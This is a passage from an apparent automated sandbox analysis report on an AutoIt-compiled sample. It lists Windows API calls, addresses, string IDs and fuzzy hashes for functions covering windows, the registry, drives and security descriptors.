                                                                                • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00CB326A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                • API String ID: 2910397461-517079104
                                                                                • Opcode ID: f2d961d75ca7050c610759a9abdfac7a0122346ea1fa294c7e689d9afe15ff6a
                                                                                • Instruction ID: 888fecc7e43f77f06c46524fad94d77da43ba4bb04616c009b3569c051ba1914
                                                                                • Opcode Fuzzy Hash: f2d961d75ca7050c610759a9abdfac7a0122346ea1fa294c7e689d9afe15ff6a
                                                                                • Instruction Fuzzy Hash: B0A14D71A50215AFEB14DFA4DC4AFAF7BB9EB48710F008119FA15EB2E0D674AD00CB64
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001), ref: 00CA5404
                                                                                • GetDriveTypeW.KERNEL32(?,00CCDB10,?,\\.\,00CCDBF4), ref: 00CA54E1
                                                                                • SetErrorMode.KERNEL32(00000000,00CCDB10,?,\\.\,00CCDBF4), ref: 00CA564D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$DriveType
                                                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                • API String ID: 2907320926-4222207086
                                                                                • Opcode ID: ec376bea622dc40e379b5dac91ea014962a5e2ceb2f31bfce22beebd89cf8f2f
                                                                                • Instruction ID: 427de5f293e96977469d7b7bee381979736f8cc1c72723e713b7b009d0d0b23c
                                                                                • Opcode Fuzzy Hash: ec376bea622dc40e379b5dac91ea014962a5e2ceb2f31bfce22beebd89cf8f2f
                                                                                • Instruction Fuzzy Hash: 0461E470648A0AAFCB54DF25C9829BC77B1BF16308BA4C165F506AB392C731EE41DB52
                                                                                APIs
                                                                                • GetSysColor.USER32(00000012), ref: 00CC7A08
                                                                                • SetTextColor.GDI32(?,00CC76DC), ref: 00CC7A0C
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00CC7A22
                                                                                • GetSysColor.USER32(0000000F), ref: 00CC7A2D
                                                                                • CreateSolidBrush.GDI32(?), ref: 00CC7A32
                                                                                • GetSysColor.USER32(00000011), ref: 00CC7A4A
                                                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CC7A58
                                                                                • SelectObject.GDI32(?,00000000), ref: 00CC7A69
                                                                                • SetBkColor.GDI32(?,?), ref: 00CC7A72
                                                                                • SelectObject.GDI32(?,?), ref: 00CC7A7F
                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 00CC7A9E
                                                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CC7AB5
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00CC7AC2
                                                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00CC7B11
                                                                                • GetWindowTextW.USER32(?,00000000,00000001), ref: 00CC7B3B
                                                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 00CC7B59
                                                                                • DrawFocusRect.USER32(?,?), ref: 00CC7B64
                                                                                • GetSysColor.USER32(00000011), ref: 00CC7B75
                                                                                • SetTextColor.GDI32(?,00000000), ref: 00CC7B7D
                                                                                • DrawTextW.USER32(?,00CC76DC,000000FF,?,00000000), ref: 00CC7B8F
                                                                                • SelectObject.GDI32(?,?), ref: 00CC7BA6
                                                                                • DeleteObject.GDI32(?), ref: 00CC7BB1
                                                                                • SelectObject.GDI32(?,?), ref: 00CC7BB7
                                                                                • DeleteObject.GDI32(?), ref: 00CC7BBC
                                                                                • SetTextColor.GDI32(?,?), ref: 00CC7BC2
                                                                                • SetBkColor.GDI32(?,?), ref: 00CC7BCC
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                • String ID:
                                                                                • API String ID: 1996641542-0
                                                                                • Opcode ID: f67b44dc7417f0b85d659581c8d1da99933c0597892f1ccb2ec492d50b1f9aa0
                                                                                • Instruction ID: c969e26f74f55c459059f56cc987dec28f4630d137f82a556917ecf2e46efaa2
                                                                                • Opcode Fuzzy Hash: f67b44dc7417f0b85d659581c8d1da99933c0597892f1ccb2ec492d50b1f9aa0
                                                                                • Instruction Fuzzy Hash: 91613E72904218AFDF019FA4DC49FEEBB79EB08320F154225F916AB2A0D7719A40DF90
                                                                                APIs
                                                                                • GetCursorPos.USER32(?), ref: 00CC182B
                                                                                • GetDesktopWindow.USER32 ref: 00CC1840
                                                                                • GetWindowRect.USER32(00000000), ref: 00CC1847
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00CC189C
                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00CC18D5
                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CC18F3
                                                                                • DestroyWindow.USER32(?), ref: 00CC1911
                                                                                • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00CC1933
                                                                                • SendMessageW.USER32(?,00000421,?,?), ref: 00CC1948
                                                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00CC195B
                                                                                • IsWindowVisible.USER32(?), ref: 00CC197B
                                                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00CC1996
                                                                                • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00CC19AA
                                                                                • GetWindowRect.USER32(?,?), ref: 00CC19C2
                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 00CC19E8
                                                                                • GetMonitorInfoW.USER32(00000000,?), ref: 00CC1A02
                                                                                • CopyRect.USER32(?,?), ref: 00CC1A19
                                                                                • SendMessageW.USER32(?,00000412,00000000), ref: 00CC1A84
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                • String ID: ($0$tooltips_class32
                                                                                • API String ID: 698492251-4156429822
                                                                                • Opcode ID: 2509cb818ae15bb3a631ae51143b4bc7b276f737a287350c5ed9056b6a0b5407
                                                                                • Instruction ID: 0766f2fdf7826e61c0c7240d53afba281c9eb32f4109fdca2d59d530b584ea62
                                                                                • Opcode Fuzzy Hash: 2509cb818ae15bb3a631ae51143b4bc7b276f737a287350c5ed9056b6a0b5407
                                                                                • Instruction Fuzzy Hash: 65B15971608341AFD714DF65C884F6ABBE4FF89310F04891CF99AA72A2C770D905DB92
                                                                                APIs
                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C32515
                                                                                • GetSystemMetrics.USER32(00000007), ref: 00C3251D
                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C32548
                                                                                • GetSystemMetrics.USER32(00000008), ref: 00C32550
                                                                                • GetSystemMetrics.USER32(00000004), ref: 00C32575
                                                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00C32592
                                                                                • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00C325A2
                                                                                • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00C325D5
                                                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00C325E9
                                                                                • GetClientRect.USER32(00000000,000000FF), ref: 00C32607
                                                                                • GetStockObject.GDI32(00000011), ref: 00C32623
                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00C3262E
                                                                                  • Part of subcall function 00C31976: GetCursorPos.USER32(?), ref: 00C3198A
                                                                                  • Part of subcall function 00C31976: ScreenToClient.USER32(00000000,?), ref: 00C319A7
                                                                                  • Part of subcall function 00C31976: GetAsyncKeyState.USER32(00000001), ref: 00C319CC
                                                                                  • Part of subcall function 00C31976: GetAsyncKeyState.USER32(00000002), ref: 00C319E6
                                                                                • SetTimer.USER32(00000000,00000000,00000028,00C31945), ref: 00C32655
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                • String ID: AutoIt v3 GUI
                                                                                • API String ID: 1458621304-248962490
                                                                                • Opcode ID: 203e2dc94e8935df9c214e00186cad434219d8f7485604d77c4ce924ed064a5f
                                                                                • Instruction ID: 92a7be964da3c139ae4764b197764352db1c30db58d17cfa10c866ef11cdca82
                                                                                • Opcode Fuzzy Hash: 203e2dc94e8935df9c214e00186cad434219d8f7485604d77c4ce924ed064a5f
                                                                                • Instruction Fuzzy Hash: AEB14A71A0120A9FDF14DFA8DC49FAE7BB4FB48315F108229FA1AA7290D7749A40DF51
                                                                                APIs
                                                                                  • Part of subcall function 00C91973: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C9198E
                                                                                  • Part of subcall function 00C91973: GetLastError.KERNEL32(?,00000000,00000000,?,?,00C91415,?,?,?), ref: 00C9199A
                                                                                  • Part of subcall function 00C91973: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C91415,?,?,?), ref: 00C919A9
                                                                                  • Part of subcall function 00C91973: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C91415,?,?,?), ref: 00C919B0
                                                                                  • Part of subcall function 00C91973: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C919C7
                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C9166F
                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C916A3
                                                                                • GetLengthSid.ADVAPI32(?), ref: 00C916BA
                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 00C916F4
                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C91710
                                                                                • GetLengthSid.ADVAPI32(?), ref: 00C91727
                                                                                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00C9172F
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00C91736
                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C91757
                                                                                • CopySid.ADVAPI32(00000000), ref: 00C9175E
                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C9178D
                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C917AF
                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C917C1
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C917E8
                                                                                • HeapFree.KERNEL32(00000000), ref: 00C917EF
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C917F8
                                                                                • HeapFree.KERNEL32(00000000), ref: 00C917FF
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C91808
                                                                                • HeapFree.KERNEL32(00000000), ref: 00C9180F
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00C9181B
                                                                                • HeapFree.KERNEL32(00000000), ref: 00C91822
                                                                                  • Part of subcall function 00C91A0D: GetProcessHeap.KERNEL32(00000008,00C9142B,?,00000000,?,00C9142B,?), ref: 00C91A1B
                                                                                  • Part of subcall function 00C91A0D: HeapAlloc.KERNEL32(00000000,?,00000000,?,00C9142B,?), ref: 00C91A22
                                                                                  • Part of subcall function 00C91A0D: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00C9142B,?), ref: 00C91A31
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                • String ID:
                                                                                • API String ID: 4175595110-0
                                                                                • Opcode ID: 2ea4ee4ce84ac39843c3dc47e6f5ad956805c8f74271e988431e1ea3671c2785
                                                                                • Instruction ID: 1b244baad6a196c85d9e58737709878c12af5e98c54369cfd45d8bdc6ceb484c
                                                                                • Opcode Fuzzy Hash: 2ea4ee4ce84ac39843c3dc47e6f5ad956805c8f74271e988431e1ea3671c2785
                                                                                • Instruction Fuzzy Hash: A7715AB690020AABDF11DFA5DC4AFEEBBB8BF04310F194125F926A6190D7319A05CB60
                                                                                APIs
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CBCC40
                                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,00CCDBF4,00000000,?,00000000,?,?), ref: 00CBCCC7
                                                                                • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00CBCD27
                                                                                • _wcslen.LIBCMT ref: 00CBCD77
                                                                                • _wcslen.LIBCMT ref: 00CBCDF2
                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00CBCE35
                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00CBCF44
                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00CBCFD0
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00CBD004
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00CBD011
                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00CBD0E3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                • API String ID: 9721498-966354055
                                                                                • Opcode ID: a324a0c1db62e3cb6ecc8df5f93b9ee8937a2c5d90a2c18f503cc4e21bd70dba
                                                                                • Instruction ID: 84f6d3b14b9751db61245e5b991633348c6b36b6ffd61e82f4e47cf30a46202f
                                                                                • Opcode Fuzzy Hash: a324a0c1db62e3cb6ecc8df5f93b9ee8937a2c5d90a2c18f503cc4e21bd70dba
                                                                                • Instruction Fuzzy Hash: 34125A352042019FDB14DF14C881B6ABBE5FF88724F15849DF89AAB3A2DB31ED41DB81
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(?,?), ref: 00CC10DC
                                                                                • _wcslen.LIBCMT ref: 00CC1117
                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00CC116A
                                                                                • _wcslen.LIBCMT ref: 00CC11A0
                                                                                • _wcslen.LIBCMT ref: 00CC121C
                                                                                • _wcslen.LIBCMT ref: 00CC1297
                                                                                  • Part of subcall function 00C4FE52: _wcslen.LIBCMT ref: 00C4FE5D
                                                                                  • Part of subcall function 00C933F3: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C93405
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                • API String ID: 1103490817-4258414348
                                                                                • Opcode ID: df7c42ba386c9d13c98293736682dc122ea6c9e2153ec228a5ff48501874c0a9
                                                                                • Instruction ID: bd49380cd773268e9902161be158736af58ff1d0fe6fe9d1c6501d24be4564bb
                                                                                • Opcode Fuzzy Hash: df7c42ba386c9d13c98293736682dc122ea6c9e2153ec228a5ff48501874c0a9
                                                                                • Instruction Fuzzy Hash: 9FE1AD352083418FCB14DF26C490E2AB7E1BF86754F09495DF8A69B7A2CB30EE45DB81
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$BuffCharUpper
                                                                                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                • API String ID: 1256254125-909552448
                                                                                • Opcode ID: c28a944b5f1b73f76943b258dafe5a76d2b1f83f30d30a9c169c905e52b1b898
                                                                                • Instruction ID: 322092a2f8e765db8871408b19c04b1ff591ba0847508d90ec9da2cbe27feafd
                                                                                • Opcode Fuzzy Hash: c28a944b5f1b73f76943b258dafe5a76d2b1f83f30d30a9c169c905e52b1b898
                                                                                • Instruction Fuzzy Hash: 0D71E23260016A8BCF109E7CCD515FE33A5AF64724F210529FC7797296FA35CE859362
                                                                                APIs
                                                                                • _wcslen.LIBCMT ref: 00CC8962
                                                                                • _wcslen.LIBCMT ref: 00CC8976
                                                                                • _wcslen.LIBCMT ref: 00CC8999
                                                                                • _wcslen.LIBCMT ref: 00CC89BC
                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00CC89FA
                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00CC3CF4,?), ref: 00CC8A56
                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CC8A8F
                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00CC8AD2
                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CC8B09
                                                                                • FreeLibrary.KERNEL32(?), ref: 00CC8B15
                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00CC8B25
                                                                                • DestroyIcon.USER32(?), ref: 00CC8B34
                                                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00CC8B51
                                                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00CC8B5D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                • String ID: .dll$.exe$.icl
                                                                                • API String ID: 799131459-1154884017
                                                                                • Opcode ID: 3cf45ff7e19bf8f35a1f9610a8740c6dde013ae38cf182c7dca9e6e4ec88fa8f
                                                                                • Instruction ID: 3bf8793a13f4f50638a8fa620b47302af1bc74d705f576abf7d92ff53116b28a
                                                                                • Opcode Fuzzy Hash: 3cf45ff7e19bf8f35a1f9610a8740c6dde013ae38cf182c7dca9e6e4ec88fa8f
                                                                                • Instruction Fuzzy Hash: 6E61BFB1500219BBEB14DB64CC81FBF77A8FB08711F10411AF926D60D1DB74AE98DBA0
                                                                                APIs
                                                                                • CharLowerBuffW.USER32(?,?), ref: 00CA480F
                                                                                • _wcslen.LIBCMT ref: 00CA481A
                                                                                • _wcslen.LIBCMT ref: 00CA4871
                                                                                • _wcslen.LIBCMT ref: 00CA48AF
                                                                                • GetDriveTypeW.KERNEL32(?), ref: 00CA48ED
                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CA4935
                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CA4970
                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CA499E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                • API String ID: 1839972693-4113822522
                                                                                • Opcode ID: 36b2073b4a5c0febd38914f9e36fb81f7ad9e3d457cef5aa6785cb301197aa27
                                                                                • Instruction ID: b3dbf261e211674bef40ea65258f5df419e97e08a68c794b4500533b725d08ce
                                                                                • Opcode Fuzzy Hash: 36b2073b4a5c0febd38914f9e36fb81f7ad9e3d457cef5aa6785cb301197aa27
                                                                                • Instruction Fuzzy Hash: 4F7100715083068FC314EF34D88196BB7E8EF95758F004A2DF8A693291EB74EE45CB92
                                                                                APIs
                                                                                • LoadIconW.USER32(00000063), ref: 00C9624A
                                                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00C9625C
                                                                                • SetWindowTextW.USER32(?,?), ref: 00C96273
                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00C96288
                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00C9628E
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00C9629E
                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00C962A4
                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00C962C5
